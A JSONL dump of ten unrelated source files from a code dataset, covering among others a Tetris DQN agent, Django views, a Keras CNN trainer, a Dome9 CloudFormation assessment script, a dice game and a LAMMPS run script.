+{"seq_id":"579399965","text":"\"\"\"\nTHis is the DQN file for Tetris AI\n\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport numpy as np\nimport cpprb\n\n\nnp.random.seed(0)\n\nclass Network(nn.Module):\n def __init__(self, alpha, inputShape, numActions):\n super().__init__()\n self.inputShape = inputShape\n self.numActions = numActions\n self.fc1Dims = 1024\n self.fc2Dims = 512\n\n self.fc1 = nn.Linear(*self.inputShape, self.fc1Dims)\n self.fc2 = nn.Linear(self.fc1Dims, self.fc2Dims)\n self.fc3 = nn.Linear(self.fc2Dims, numActions)\n\n self.optimizer = optim.Adam(self.parameters(), lr=alpha)\n self.loss = nn.MSELoss()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # self.device = T.device(\"cpu\")\n self.to(self.device)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n x = self.fc3(x)\n\n return x\n\nclass Agent():\n def __init__(self, lr, input_shape, n_actions, eps_dec=0.001, eps_min=0.001, reward_shape=2):\n self.lr = lr\n self.gamma = 0.99\n self.reward_shape = reward_shape\n self.input_shape = input_shape\n self.n_actions = n_actions\n self.surprise = 0.5\n\n self.learn_cntr = 0\n self.replace = 100\n\n self.eps = 1\n self.eps_dec = eps_dec\n self.eps_min = eps_min\n\n self.model = Network(lr, self.input_shape, self.n_actions)\n self.target = Network(lr, self.input_shape, self.n_actions)\n self.memory = cpprb.ReplayBuffer(1_000_000,{\"obs\": {\"shape\": self.input_shape},\n \"act\": {\"shape\": 1},\n \"rew\": {},\n \"next_obs\": {\"shape\": self.input_shape},\n \"done\": {},\n })\n\n\n def choose_action(self, state):\n if np.random.random() > self.eps:\n state = torch.Tensor(state).to(self.model.device)\n states = state.unsqueeze(0)\n actions = self.model(states)\n action = torch.argmax(actions).item()\n else:\n action = np.random.choice([i for i in range(self.n_actions)])\n\n return action\n\n def replace_ntwrk(self):\n self.target.load_state_dict(self.model.state_dict())\n\n def learn(self, batchSize):\n if self.memory.memCount < batchSize:\n return\n\n self.model.optimizer.zero_grad()\n\n if self.learn_cntr % self.replace == 0:\n self.replace_ntwrk()\n\n state, action, reward, state_, done, players = self.memory.sample(batchSize)\n\n states = torch.Tensor(state).to(torch.float32 ).to(self.model.device)\n actions = torch.Tensor(action).to(torch.int64 ).to(self.model.device)\n rewards = torch.Tensor(reward).to(torch.float32 ).to(self.model.device)\n states_ = torch.Tensor(state_).to(torch.float32 ).to(self.model.device)\n dones = torch.Tensor(done).to(torch.bool ).to(self.model.device)\n\n batch_indices = np.arange(batchSize, dtype=np.int64)\n qValue = self.model(states, players)[batch_indices, actions]\n\n qValues_ = self.target(states_)\n qValue_ = torch.max(qValues_, dim=1)[0]\n qValue_[dones] = 0.0\n\n td = rewards + self.gamma * qValue_\n loss = self.model.loss(td, qValue)\n loss.backward()\n self.model.optimizer.step()\n\n # PER\n error = td - qValue\n\n\n self.eps -= self.eps_dec\n if self.eps < self.eps_min:\n self.eps = self.eps_min\n\n self.learn_cntr += 1\n","sub_path":"DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"291386892","text":"from functools import reduce\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom apps.sites.models import Site\n\n\nclass SitesView(ListView):\n model = Site\n template_name = 'sites.html'\n\n def render_to_response(self, context, **response_kwargs):\n response_kwargs.setdefault('content_type', self.content_type)\n context.update({'sites': Site.objects.all(),\n 'active': 'sites'})\n return self.response_class(\n request=self.request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n\n\nclass SiteDetailView(DetailView):\n model = Site\n pk_url_kwarg = 'site_id'\n template_name = 'site.html'\n\n def get(self, request, *args, **kwargs):\n self.object = self.get_object()\n context = self.get_context_data(object=self.object)\n context.update({'active': 'sites'})\n return self.render_to_response(context)\n\n\nclass SummaryView(ListView):\n model = Site\n template_name = 'summary.html'\n\n def render_to_response(self, context, **response_kwargs):\n context.update({'active': 'summary'})\n\n for i in context['object_list']:\n a_value = reduce(lambda x, y: x + y, [i.a_value for i in i.values.all()])\n b_value = reduce(lambda x, y: x + y, [i.b_value for i in i.values.all()])\n\n setattr(i, 'a_value', a_value)\n setattr(i, 'b_value', b_value)\n\n response_kwargs.setdefault('content_type', self.content_type)\n return self.response_class(\n request=self.request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n\n\nclass SummaryAverageView(ListView):\n model = Site\n template_name = 'summary.html'\n\n def render_to_response(self, context, **response_kwargs):\n context.update({'active': 'average'})\n\n for i in context['object_list']:\n total_values = len(i.values.all())\n a_value = reduce(lambda x, y: x + y, [i.a_value for i in i.values.all()])\n b_value = reduce(lambda x, y: x + y, [i.b_value for i in i.values.all()])\n\n a_value /= total_values\n b_value /= total_values\n\n setattr(i, 'a_value', a_value)\n setattr(i, 'b_value', b_value)\n\n response_kwargs.setdefault('content_type', self.content_type)\n return self.response_class(\n request=self.request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n","sub_path":"apps/sites/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"373917445","text":"#!/usr/bin/env python2.7\n# -*- mode: python; encoding: utf-8; -*-\n\"\"\".\n\nXXX: This code is shared with apt-config-tool.\n\"\"\"\nfrom __future__ import division, absolute_import, unicode_literals, print_function\nfrom future_builtins import *\n\nimport logging\nimport subprocess\n\nfrom intensional import Re\n\n\nlog = logging.getLogger('apt-config-tool')\n\n\ndef parse_apt_config(dump):\n for line in dump.splitlines():\n if line not in Re(r'^([^ ]+) \"(.*)\";$'):\n raise AssertionError('Horrible parsing code has horribly failed!')\n yield (Re._[1], Re._[2])\n\n\ndef get_apt_config():\n return dict(parse_apt_config(subprocess.check_output(('apt-config', 'dump'))))\n\n\ndef get_apt_proxy():\n config = get_apt_config()\n\n proxy = config.get('Acquire::http::Proxy')\n if proxy:\n log.debug('Using host\\'s apt proxy: {}'.format(proxy))\n return proxy\n\n # You can install squid-deb-proxy-client, which supplies a tiny little script that asks avahi\n # for any zeroconf-advertised apt proxies.\n proxy_autodetect = config.get('Acquire::http::ProxyAutoDetect')\n if proxy_autodetect:\n log.debug('Using host\\'s apt proxy autodetection script: {}'.format(proxy_autodetect))\n proxy = subprocess.check_output((proxy_autodetect,)).strip()\n if proxy:\n log.debug('Autodetected apt proxy: {}'.format(proxy))\n return proxy\n\n log.debug('Couldn\\'t find an apt proxy.')\n return None\n","sub_path":"docker_debuild/apt_proxy_utils.py","file_name":"apt_proxy_utils.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"115276597","text":"from keras.metrics import *\nfrom keras.layers import *\nfrom keras.models import *\nfrom keras.callbacks import *\nfrom keras.optimizers import *\nfrom keras.preprocessing.image import ImageDataGenerator\n\n# dimensions of our images.\nimg_width, img_height = 128, 128\n\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/validation'\nnb_train_samples = 435130\nnb_validation_samples = 24426\nepochs = 50\nbatch_size = 64\n\n# changez le nom à chaque fois svp ↓\nexperiment_name = \"INATURALIST_E500_D512_C16.3.3_Lr0.01_Relu\"\ntb_callback = TensorBoard(\"./logs/\" + experiment_name, )\n\nprint(\"Model training will start soon\")\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(16, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(16, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(8142))\nmodel.add(Activation('softmax'))\n\nsgd = optimizers.SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)\n\n# model.compile(loss='binary_crossentropy',\n# optimizer='rmsprop',\n# metrics=['accuracy'])\n\n\n# model.compile(sgd, mse, metrics=['categorical_accuracy'])\nmodel.compile(sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n\n# this is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\n# this is the augmentation configuration we will use for testing:\n# only rescaling\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n\n target_size=(img_width, img_height),\n batch_size=batch_size, shuffle=True, seed=None,\n class_mode='categorical',\n interpolation='nearest')\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size, shuffle=True, seed=None,\n class_mode='categorical',\n interpolation='nearest')\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n callbacks=[tb_callback],\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size)\n\nmodel.save_weights('first_try.h5')\n","sub_path":"models/conv2d.py","file_name":"conv2d.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"429368635","text":"# 3rd party libraries\nimport boto3 # $ pip install boto3\nimport requests # $ pip install requests\n\n# python standard libraries\nimport json\nimport csv\nimport argparse\nimport datetime\nimport os\n\nt0 = datetime.datetime.utcnow()\ntotal_sec = 0\nAPIVersion=1.01\n\n\nclass FailedEntity:\n def __init__(self):\n self.entity_id = None\n self.arn = None\n self.name = None\n self.tags = None\n self.type = None\n\n def set_entity_id(self, entity_id):\n self.entity_id = entity_id\n\n def set_arn(self, arn):\n self.arn = arn\n\n def set_name(self, name):\n self.name = name\n\n def set_tags(self, tags):\n self.tags = tags\n\n def set_type(self, type):\n self.type = type\n\n def __str__(self):\n rep = \"\\t\\t\\tEntity:\\n\"\n rep += ''.join(filter(None, [\"\\t\\t\\ttype: \", self.type, \"\\n\"]))\n rep += ''.join(filter(None, [\"\\t\\t\\tname: \", self.name, \"\\n\"]))\n rep += ''.join(filter(None, [\"\\t\\t\\tid: \", self.entity_id, \"\\n\"]))\n # rep += ''.join(filter(None, [\"\\t\\t\\tarn: \", self.arn, \"\\n\"]))\n\n return rep\n\n\nclass FailedTest:\n def __init__(self):\n self.rule_name = None\n self.rule_desc = None\n self.rule_severity = None\n\n def set_rule_name(self, rule_name):\n self.rule_name = rule_name\n\n def set_rule_desc(self, rule_desc):\n self.rule_desc = rule_desc\n\n def set_rule_severity(self, rule_severity):\n self.rule_severity = rule_severity\n\n def __str__(self):\n rep = \"\\tTest:\\n\"\n rep += \"\\t\\trule name: \" + self.rule_name + \"\\n\"\n rep += \"\\t\\tseverity: \" + self.rule_severity + \"\\n\"\n # rep += \"\\t\\tdescription: \" + self.rule_desc + \"\\n\"\n\n return rep\n\n\ndef run_assessment(bundle_id, aws_cloud_account, d9_secret, d9_key, region, d9_cloud_account=\"\", maxTimeoutMinutes=10):\n\n global t0,total_sec\n t0_run_assessment = datetime.datetime.utcnow()\n t0 = datetime.datetime.utcnow()\n d9region = region.replace('-', '_') # dome9 identifies regions with underscores\n print(\"\\n Dome9 Run Assessment Interface Version - {}\".format(APIVersion))\n print(\"\\n\" + \"*\" * 50 + \"\\nStarting Assessment Execution\\n\" + \"*\" * 50)\n d9_id = \"\"\n # Need to get the Dome9 cloud account representation\n if d9_cloud_account == \"\":\n print('\\nResolving Dome9 account id from aws account number: {}'.format(aws_cloud_account))\n r = requests.get('https://api.dome9.com/v2/cloudaccounts/{}'.format(aws_cloud_account),\n auth=(d9_key, d9_secret))\n r.raise_for_status()\n d9_id = r.json()['id']\n print('Found it. Dome9 cloud account Id={}'.format(d9_id))\n\n headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n\n body = {\n \"id\": bundle_id,\n \"cloudAccountId\": d9_id,\n \"region\": d9region,\n \"cloudAccountType\": \"Aws\"\n }\n\n r = requests.post('https://api.dome9.com/v2/assessment/bundleV2', data=json.dumps(body), headers=headers,\n auth=(d9_key, d9_secret))\n r.raise_for_status()\n tn = datetime.datetime.utcnow()\n\n #check that max timeout was not reached\n if checkThatMaxTimeWasNotReached(t0, maxTimeoutMinutes):\n return\n\n total_sec = total_sec + (tn - t0).total_seconds()\n\n print(\"\\n\" + \"*\" * 50 + \"\\nAssessment Execution Done in {} seconds \\n\".format((tn - t0_run_assessment).total_seconds()) + \"*\" * 50)\n\n return r.json()\n\n\n# Analyze the assessment execution result and return the assets id and types for all the assets the fail in\n# each rule execution\n\ndef print_map(failed_Test_relevant_entites_map):\n for test in failed_Test_relevant_entites_map:\n print(test)\n print(\"\\n\\t\\tFailed Entities:\\n\")\n for entity in failed_Test_relevant_entites_map[test]:\n print(entity)\n\n\ndef checkThatMaxTimeWasNotReached (t0, maxTimeoutMinutes):\n tNow = datetime.datetime.utcnow()\n elapsed = (tNow - t0).total_seconds()\n print('\\nCurrent run time of d9 assessment execution and analyzing is - {} Seconds\\n'.format(elapsed))\n if elapsed > maxTimeoutMinutes * 60:\n print('\\nStopping script, passed maxTimeoutMinutes ({})'.format(maxTimeoutMinutes))\n return True\n return False\n\ndef analyze_assessment_result(assessment_result, aws_cloud_account, region, stack_name, aws_profile='', print_flag=True, maxTimeoutMinutes=10):\n global t0, total_sec\n t0_run_assessment_analyze = datetime.datetime.utcnow()\n\n # resource_physical_ids - its a list of the resource ids that related to the stack_name and supported by Dome9\n # The ids are from the cfn describe and based on the PhysicalResourceId field list_of_failed_entities - It's a\n # list of FailedEntity that will contain for each failed entities in the assessment result it's id,arn,name,tags\n print(\"\\n\" + \"*\" * 50 + \"\\nStarting To Analyze Assessment Result\\n\" + \"*\" * 50 + \"\\n\")\n (resource_physical_ids, filed_tests_map) = prepare_results_to_analyze(aws_cloud_account, region, stack_name,\n aws_profile, assessment_result)\n\n print(\"\\nBundle - {}\".format(assessment_result[\"request\"][\"name\"]))\n print(\"\\nNumber of total failed tests: {}\\n\".format(len(filed_tests_map)))\n print(\"\\nFailed Tests that are relevant to the Stack - {}:\\n\".format(stack_name))\n\n # add statistics about the assessment result and print the stuck name\n\n\n failed_test_relevant_entities_map = dict()\n for failed_test in filed_tests_map:\n fallback = True\n relevant_failed_entities = list()\n for failed_entity in filed_tests_map[failed_test]:\n # 1st check with the tags \"key\": \"aws:cloudformation:stack-name\" equals to our stack_name\n if failed_entity.tags:\n for tag in failed_entity.tags:\n if tag[\"key\"] == \"aws:cloudformation:stack-name\" and tag[\"value\"] == stack_name:\n relevant_failed_entities.append(failed_entity)\n fallback = False\n # 2nd if the entity doesn't have tags fall back to id\n if fallback and failed_entity.entity_id:\n if failed_entity.entity_id in resource_physical_ids:\n relevant_failed_entities.append(failed_entity)\n fallback = False\n # 3rd fall back to name\n if fallback and failed_entity.name:\n if failed_entity.name in resource_physical_ids:\n relevant_failed_entities.append(failed_entity)\n fallback = False\n # 4th fall back to arn\n if fallback and failed_entity.arn:\n if failed_entity.arn in resource_physical_ids:\n relevant_failed_entities.append(failed_entity)\n fallback = False\n\n if len(relevant_failed_entities) > 0:\n failed_test_relevant_entities_map[failed_test] = relevant_failed_entities\n if print_flag:\n print_map(failed_test_relevant_entities_map)\n\n #check that max timeout was not reached\n if checkThatMaxTimeWasNotReached(t0, maxTimeoutMinutes):\n return\n\n tn = datetime.datetime.utcnow()\n total_sec = total_sec + (tn - t0_run_assessment_analyze).total_seconds()\n print(\"\\n\" + \"*\" * 50 + \"\\nAssessment Analyzing Was Done in {} seconds\\n\".format((tn - t0_run_assessment_analyze).total_seconds()) + \"*\" * 50 + \"\\n\")\n\n return failed_test_relevant_entities_map\n\n\ndef prepare_results_to_analyze(aws_cloud_account, region, stack_name, aws_profile, assessment_result):\n # allow to specify specific profile, fallback to standard boto credentials lookup strategy\n # https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html\n aws_session = boto3.session.Session(profile_name=aws_profile,\n region_name=region) if aws_profile else boto3.session.Session(\n region_name=region)\n\n # sanity test - verify that we have credentials for the relevant AWS account numnber\n sts = aws_session.client('sts')\n account_id = sts.get_caller_identity()[\"Account\"]\n if (str(aws_cloud_account) != str(account_id)):\n print(aws_cloud_account)\n print(account_id)\n print(\n 'Error - the provided awsAccNumber ({}) is not tied to the AWS credentials of this script ({}) consider '\n 'providing a different \"profile\" argument'.format(\n aws_cloud_account, account_id))\n exit(2)\n\n cfn = aws_session.client('cloudformation')\n response_pages = list()\n api_response = cfn.list_stack_resources(\n StackName=stack_name,\n )\n\n # print(api_response)\n response_pages.append(api_response)\n while 'NextToken' in api_response:\n api_response = cfn.list_stack_resources(\n StackName=stack_name,\n NextToken=api_response['NextToken']\n )\n response_pages.append(api_response)\n\n # get dome9 types from mapping file\n MAPPINGS_PATH = \"%s/cfn_mappings.csv\" % (os.path.dirname(os.path.realpath(__file__)))\n cfn_mappings = dict()\n with open(MAPPINGS_PATH, \"r\") as f:\n reader = csv.DictReader(f)\n for item in reader:\n if item['Dome9']:\n cfn_mappings[item['CFN']] = item['Dome9'].split(',')\n\n # Prepare the set of physical resource ids for the relevant d9 supported resources from the stack\n resource_physical_ids = set() # set will make it unique\n for response in response_pages:\n for resource in response['StackResourceSummaries']:\n resource_type = resource['ResourceType']\n resource_physical_id = resource[\"PhysicalResourceId\"]\n if resource_type in cfn_mappings:\n resource_physical_ids.add(resource_physical_id)\n\n # Prepare full entity representation (id,arn,name) of each failed entity\n filed_tests_map = dict()\n\n # for all the failed tests\n for test in [tst for tst in assessment_result[\"tests\"] if not tst[\"testPassed\"]]:\n failed_test = FailedTest()\n list_of_failed_entities = list()\n failed_test.set_rule_name(test[\"rule\"][\"name\"])\n failed_test.set_rule_severity(test[\"rule\"][\"severity\"])\n failed_test.set_rule_desc(test[\"rule\"][\"description\"])\n\n filed_tests_map[failed_test] = None\n\n # for each failed asset\n for entity in [ast for ast in test[\"entityResults\"] if ast[\"isRelevant\"] and not ast[\"isValid\"]]:\n entity_type = entity['testObj']['entityType']\n entity_idx = entity['testObj'][\"entityIndex\"]\n if entity_idx >= 0:\n full_d9_entity = assessment_result[\"testEntities\"][entity_type][entity_idx]\n failed_entity = FailedEntity()\n failed_entity.set_type(entity_type)\n # print(full_d9_entity_json)\n if 'id' in full_d9_entity:\n failed_entity.set_entity_id(full_d9_entity[\"id\"])\n if 'arn' in full_d9_entity:\n failed_entity.set_arn(full_d9_entity[\"arn\"])\n if 'name' in full_d9_entity:\n failed_entity.set_name(full_d9_entity[\"name\"])\n if 'tags' in full_d9_entity:\n failed_entity.set_tags(full_d9_entity[\"tags\"])\n list_of_failed_entities.append(failed_entity)\n filed_tests_map[failed_test] = list_of_failed_entities\n\n return resource_physical_ids, filed_tests_map\n\n\ndef main():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--d9keyId', required=True, type=str)\n parser.add_argument('--d9secret', required=True, type=str)\n parser.add_argument('--awsCliProfile', required=False, type=str)\n parser.add_argument('--awsAccountNumber', required=True, type=str)\n parser.add_argument('--d9CloudAccount', required=False, type=str, default='')\n parser.add_argument('--region', required=True, type=str)\n parser.add_argument('--stackName', required=True, type=str)\n parser.add_argument('--bundleId', required=True, type=int)\n parser.add_argument('--maxTimeoutMinutes', required=False, type=int, default=10)\n args = parser.parse_args()\n # Take start time\n print(\"\\n\\n{}\\nStarting...\\n{}\\n\\nSetting now (UTC {}) \".format(80 * '*', 80 * '*', t0))\n\n result = run_assessment(bundle_id=args.bundleId, aws_cloud_account=args.awsAccountNumber,\n d9_secret=args.d9secret,\n d9_key=args.d9keyId, region=args.region, maxTimeoutMinutes=args.maxTimeoutMinutes)\n res = analyze_assessment_result(assessment_result=result, aws_cloud_account=args.awsAccountNumber,\n region=args.region,\n stack_name=args.stackName, aws_profile=args.awsCliProfile, maxTimeoutMinutes=args.maxTimeoutMinutes)\n\n print(\"\\n\" + \"*\" * 50 + \"\\nRun and analyzing Assessment Script ran for {} seconds\\n\".format(\n total_sec) + \"*\" * 50 + \"\\n\")\n return res\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"Dome9 CI:CD Scripts Interface/d9_run_assessment.py","file_name":"d9_run_assessment.py","file_ext":"py","file_size_in_byte":13103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"516418046","text":"import random\ndinheiros = 1000\njogo = True\nwhile jogo:\n iniciar = input('Quer apostar? (sim/não): ')\n if iniciar == 'não':\n jogo = False\n else:\n dado1 = random.randint(1,6)\n dado2 = random.randint(1,6)\n sdados = dado1+dado2\n jogada = True\n valor_aposta = 30\n while jogada:\n dinheiros -= valor_aposta \n valor_aposta -= 10\n aposta = int(input('Qual o valor da soma?: '))\n if aposta == sdados:\n dinheiros += 50\n jogada = False\n else:\n if valor_aposta == 0:\n jogada = False\n else:\n pergunta = input('Quer continuar tentando ou vai desistir?: ')\n if pergunta == 'desistir':\n jogada = False\n print('Você terminou a partida com {0} dinheiros'.format(dinheiros))\n if dinheiros <= 0:\n jogo = False\n \n ","sub_path":"backup/user_202/ch141_2020_04_01_20_42_35_039384.py","file_name":"ch141_2020_04_01_20_42_35_039384.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"71666809","text":"\"\"\"This file houses the balance function and helper functions that\r\ncomes with it. \"\"\"\r\n\r\nimport country as c\r\nimport random\r\nfrom country import Country\r\nfrom operator import attrgetter\r\n\r\n\r\ndef find_negative_country(curr_country: Country) -> Country:\r\n temp_list = c.country_master_list\r\n temp_list.reverse\r\n for country in temp_list:\r\n if country.surplus() < 0:\r\n return country\r\n\r\n\r\ndef find_poor_country(curr_country: Country) -> Country:\r\n temp_master_list = c.country_master_list\r\n temp_master_list.sort(key=attrgetter(\"gdp\"))\r\n for country in temp_master_list:\r\n if country.surplus() < 2:\r\n return country\r\n\r\n\r\ndef test_total_vaccines():\r\n total = 0\r\n for country in c.country_master_list:\r\n total += country.num_vaccines\r\n return total\r\n\r\n\r\ndef new_bal() -> None:\r\n for country in c.country_master_list:\r\n value = country.surplus()\r\n if value > 0:\r\n if find_negative_country(country) is None:\r\n break\r\n else:\r\n for country2 in c.country_master_list:\r\n if country2.surplus() < 0:\r\n country.donate(country.surplus())\r\n country2.receive_donation(country.surplus())\r\n\r\n\r\ndef scaled_vaccine_nums(country: str) -> int:\r\n \"\"\"This function will return an approprite integer which represents the \r\n number of vaccines a country has\"\"\"\r\n\r\n country2 = c.find_country(c.country_master_list, country)\r\n return random.randint(int(country2.num_pop-country2.num_pop*0.25), int(country2.num_pop+country2.num_pop*0.10))\r\n\r\n","sub_path":"balance_distributions.py","file_name":"balance_distributions.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"394346186","text":"import base_disaster_scenario\nfrom rally.benchmark.scenarios import base\n\n\nclass BaseDisasterScenario(base_disaster_scenario.BaseDisasterScenario):\n\n @base.scenario()\n def test_scenario_1(self):\n self.run_disaster_command(self.context[\"controllers\"][0],\n \"stop rabbitmq service\")\n\n ## need to extend it\n self.boot_vm()","sub_path":"rally-scenarios/rabbitmq_disaster_scenarios.py","file_name":"rabbitmq_disaster_scenarios.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"196958799","text":"\n# This script is run automatically when motion is detected\n# Store this file at /etc/motion/motion_handler.py\n\nimport base64\nimport requests\nimport configparser\n\n# Get API keys and metadata from config file.\nconfig = configparser.RawConfigParser()\nconfig.read('/etc/motion/api_keys.cfg')\napp_id = config.get('KairosData', 'app_id')\napp_key = config.get('KairosData', 'app_key')\ngallery_name = config.get('KairosData', 'gallery_name')\n\n# image_filename is the path to the image you want to enroll\nimage_filename = config.get('KairosData', 'image_filename')\n\n# subject_id is the ID for the face being enrolled\nsubject_id = config.get('KairosData', 'subject_id')\n\nimage_file = open(image_filename, \"rb\")\nimage = base64.b64encode(image_file.read()).decode(\"ascii\")\nimage_file.close()\n\nvalues = {\n \"image\": image,\n \"subject_id\": subject_id,\n \"gallery_name\": gallery_name,\n}\n\nheaders = {\n 'Content-Type': 'application/json',\n 'app_id': app_id,\n 'app_key': app_key\n}\n\nresponse = requests.post('https://api.kairos.com/enroll', json=values, headers=headers).json()\n\nprint(response)","sub_path":"utils/enroll_image.py","file_name":"enroll_image.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"539580902","text":"# create_runs.py\n# Script that compiles and executes .cpp files\n# Usage:\n# python create_runs.py (without .cpp extension)\n\nimport sys, os, getopt, re \nimport shutil\ndef main():\n run_dir = '/home/student/Desktop/Shira_Michal/before_ delete/8_16'\n params_file = open('{}/nvt_BB_real/Extra_Potential_Parameters.txt'.format(run_dir), 'r')\n lines = params_file.readlines()\n f1_vals = lines[19]\n f1_vals = f1_vals.split(\",\")\n f2_vals = lines[21]\n f2_vals = f2_vals.split(\",\")\n params_file.close()\n f1_vals = range(int(f1_vals[0]), int(f1_vals[1]), int(f1_vals[2]))# range(50, 151, 50)\n f2_vals = float(f2_vals[0])# range(0.75,1,1)\n\t# 3 steps of run\n suffixes = [('min', 'min'),\n ('nvt_1', 'nvt'),\n ('nvt_BB_real', 'nvt')]\n for f11 in f1_vals:\n for f12 in f1_vals:\n #for f13 in f1_vals:\n for f14 in f1_vals:\n if (True): #(f11 == 50 and f12 == 100 and f14 == 150): \t# for case of run only one combination\n print ('------------------------------ f11, f12, f14:', f11, f12,0, f14)\n ############################# update the f1, f2 params in the file #################################\n params_file = open('{}/nvt_BB_real/Extra_Potential_Parameters.txt'.format(run_dir), 'r')\n lines = params_file.readlines()\n params_file.close()\n params_file = open('{}/nvt_BB_real/Extra_Potential_Parameters.txt'.format(run_dir), 'w')\n mult = []\n mult.append(f11)\n mult.append(f12)\n mult.append(0)#f13)\n mult.append(f14)\n for line_num, (line, f1) in enumerate(zip(lines[14:], mult)):\n data = line.split()\n data[2] = str(f1)\n data[3] = str(f2_vals)\n if line_num == 2:\n data[3] = str(0)\n lines[line_num+14] = ' '.join(data) + '\\n'\n params_file.writelines(lines)\n params_file.close()\n ###################################################################################################\n ########################################## runs 3 levels ##########################################\n for suffix, exe_file in suffixes:\n if True: # suffix == 'nvt_BB_real': #just for the first time you run the program on this size of run(2-4, 8-18, 16-32...) you need the True else use the 'nvt_BB_real' condition\n curr_dir = '{}/{}'.format(run_dir, suffix)\n # cmd = '/home/student/lammps/src/lmp_serial < in.{}'.format(exe_file)\n cmd = 'OMP_NUM_THREADS=4 /home/student/lammps/src/lmp_omp -sf omp < in.{}'.format(exe_file)\n out_file = 'res_{}.txt'.format(exe_file)\n run(curr_dir, cmd, out_file) # do cd + run in.suffix\n ###################################################################################################\n ################################ save results of nvt__BB run ######################################\n inputFile_t = str('{}/nvt_BB_real/species.out'.format(run_dir))\n all_species = str('{}/nvt_BB_real/all_results_for_f1_f2/'.format(run_dir))+'species'+str(f11)+\"_\"+ str(f12)+ \"_\"+str(0)+ \"_\"+str(f14)+'.txt'\n shutil.copy2(inputFile_t, all_species)\n inputFile_t = str('{}/nvt_BB_real/bonds.reax'.format(run_dir))\n all_species = str('{}/nvt_BB_real/all_results_for_f1_f2/'.format(run_dir)) + 'bonds' + str(f11) + \"_\" + str(f12) + \"_\" + str(0) + \"_\" + str(f14) + '.reax'\n shutil.copy2(inputFile_t, all_species)\n\n ###################################################################################################\n print(\"complited\")\n\ndef run(dir, cmd, out_file):\n\t# this func execute cpp functions\n os.chdir(dir)\n os.system(\"echo do cd to \" + os.getcwd())\n os.system(\"echo Running \" + cmd)\n os.system('{} > {}'.format(cmd, out_file))\n os.system(\"echo -------------------\")\n\nif __name__=='__main__':\n main()\n","sub_path":"python code/create_runs.py","file_name":"create_runs.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
